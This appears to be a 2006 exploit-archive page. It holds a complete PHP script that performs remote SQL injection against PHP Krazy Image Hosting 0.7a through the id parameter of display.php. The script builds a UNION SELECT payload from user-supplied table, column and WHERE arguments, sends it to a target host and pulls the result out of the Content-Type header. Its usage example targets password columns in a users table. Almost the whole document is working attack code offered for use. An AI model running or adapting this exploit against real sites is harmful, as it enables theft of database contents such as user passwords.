PHP Krazy Image Hosting 0.7a (display.php) SQL Injection Exploit

2006-09-29 00:00:00

<?
/*****************************************************************\
|* PHP Krazy Image Host Script (id) Remote SQL Injection Exploit *|
|* Discovered by: Trex *|
|* Solution: http://www.trex-online.net/fixes/display.rar *|
|* Visit: Trex-Online.net / UnderGround.ag *|
\*****************************************************************/

error_reporting(0);

echo "# PHP Krazy Image Host Script (id) Remote SQL Injection Exploit\n";
echo "# Discovered by: Trex\n";
echo "# Solution: http://www.trex-online.net/fixes/display.rar\n";
echo "# Visit: Trex-Online.net / UnderGround.ag\n\n";
echo "# Usage: $ php " . $_SERVER['PHP_SELF'] . " [URL] [PATH] [SELECT] [FROM] [WHERE]\n";
echo "# Example: $ php " . $_SERVER['PHP_SELF'] . " http://localhost /images/ password users userID=1\n\n";

if (!$_SERVER['argv'][5])
die();

$url = parse_url($_SERVER['argv'][1] . $_SERVER['argv'][2]);

$sql = "UNION+SELECT+1,1,1,1," . $_SERVER['argv'][3] . ",1,1,1+FROM+" . $_SERVER['argv'][4] . "+WHERE+" . $_SERVER['argv'][5] . "/*";

echo "Connecting to " . $url['host'] . ":80 ... ";

if (!$fsp = fsockopen($url['host'], 80, $errno, $errstr, $timeout))
die("failed.\nReason: " . $errno . " - " . $errstr);

echo "done.\n\n";

$request = "HEAD " . $url['path'] . "display.php?id=0+" . $sql . " HTTP/1.1\r\n";
$request .= "Host: " . $url['host'] . "\r\n";
$request .= "Connection: Close\r\n\r\n";

fputs($fsp, $request);

while (!feof($fsp)) {
$response = fgets($fsp, 4096);
$response = explode(":", $response, 2);

if (count($response) == 2 && preg_match("/Content-Type/", $response[0]))
$result = $response[1];
}

if (preg_match("/text\/html/", $result))
echo "Exploit failed!";
else
echo "Result: " . $result;
?>

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.